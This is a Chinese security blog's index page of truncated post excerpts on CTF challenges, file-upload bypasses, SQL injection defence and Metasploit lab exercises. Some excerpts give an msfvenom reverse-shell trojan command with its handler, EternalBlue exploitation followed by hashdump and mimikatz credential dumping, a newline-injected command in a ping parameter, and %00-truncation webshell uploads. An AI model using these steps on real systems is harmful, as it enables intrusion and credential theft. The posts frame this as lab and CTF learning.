iloveflag-blog

iloveflag-blog

iloveflag.com

Docker的大坑记录
本来出道web题投稿到安恒的,安恒要写Dockerfile,怕是在为难我胖虎!! 好了,速学了一下docker,请教了docker忘的差不多的云计算选手 我的天,到最后还是一大堆bug 也就是搭建一个centos的环境,要有apache和php就行 没找到用centos镜像再去装apache和php的,找到了也是一堆bug,就拉了一个现成的 FROM naqoda/centos-apache-phpCOPY html/index.php /var/www/app/public_html/RUN echo “ServerName localhost:80” >...
requests进行文件上传
1234567891011121314151617181920212223242526272829303132333435363738394041424344<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title></title></head><body><form method="POST" encty...
浅谈文件上传的后缀检测
这是油管上的代码,我在思考这种判别后缀的方式有没有漏洞,第一时间想到的是%00截断,但是实验后发现比如1.php%00.jpg,%00后面的已经过滤了,然后.号分隔取最后,无法绕过,我在freebuf上也看到这个白名单检测的问题(http://www.freebuf.com/vuls/128846.html)在分隔成数组之前已经是php后缀了当然往跟深处讲,如果网站有文件包含漏洞的话,将一句话木马变成png上传成功后,再利用文件包含,也是可行的方法!dvwa的后缀检测:更多白名单的后缀检测:(https://www.jb51.net/article/81320.htm)
sql注入与防御1(mysqli_real_escape_string)
sql注入一种常见的网络攻击手段,以前没学php的时候只会一点mysql的语言,万能密码啥的绕过,防御只了解过pdo,手工注入更是弱爆,直接sqlmap注入,现在学了php后,有了一个全新的认识 油管大佬介绍了利用mysqli_real_escape_string这个函数来防御SQL注入:(https://youtu.be/nTgFPcYRkys) 函数介绍:(http://www.w3school.com.cn/php/func_mysql_real_escape_string.asp) 于是我专门实验了万能密码的绕过 先在我的数据库创建一张表:   撸上我的代码: 看...
2018安恒杯7月
misc1F5算法:https://github.com/matthewgao/F5-steganography java Extract Misc.jpg zip伪加密1->0 mis2注释得到摩斯密码解密(为压缩包密码) lsb隐写:https://github.com/livz/cloacked-pixel python lsb.py extract (python2环境) web3:web3原理:http://www.freebuf.com/articles/web/35353.html swf zws头部解析:https://blog.csdn.net/Hundred...
远程命令注入
ctf里某群友发的题:http://45.124.115.155:8003/a74a15c5fb626077/** ls cat 啥的都被过滤了(http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20ping.php): PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.086 ms --- 127.0.0.1 ping statistics -...
kali获取持续性后门shell
win7靶机:192.168.1.38 kali:192.168.1.35 上一篇讲到通过ms17_010获取了shell,如果对方没有这个漏洞可以利用呢?换一种社会工程学的思路: msfvenom -p windows/meterpreter/resverse_tcp lhost=192.168.1.35 lport=4444 -f exe -o /hack.exe 生成木马 将exe文件发送给靶机 use exploit/multi/handle set payload windows/meterpreter/resverse_tcp set lhost 192.168.1.3...
ms17_010和ms08-067实验笔记
win7靶机:192.168.1.38(所有实验均在虚拟机上完成,切勿用于非法用途) kali:192.168.1.35 use exploit/windows/smb/ms17_010_eternalblueset payload windows/meterpreter/reverse_tcp 查看下options 返回shell后:hashdump load mimikatz 运行命令msv,导出hash msv 然后执行kerberos即可获得目标机账号密码 kerberos 使用端口转发工具,将端口转发到访问者本地机器的某个端口,从而进行连接运行命令 portfwd...
javascript实现图片变换
123456789101112131415161718192021222324<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Document</title></head><body><img src="hack.jpg" id="image"><scri...
php 文件上传漏洞之%00截断上传
原理(来源为网上): 1.为什么在文件后面加上<.jpg>和在数据包后面加上修改后的文件名? PHP在对文件后缀进行判断时是对最后一个 <.xxx> 来判断的。这样我们修改过后的文件 名,PHP会将其判断为.jpg文件这样我们可以绕过对文件名的检测。2.为什么我们对文件名修改过后还需要添加%00截断? 尽管我们知道我们上传的是一个PHP文件,但是如果不进行%00截断,我们上传的文件在服务 器上是以格式保存也就是说这是一个图片文件,PHP是不会解析这个文件。 当我们进行%00截断后,服务器就会将%00后的<.jpg>进行截断,这是我们...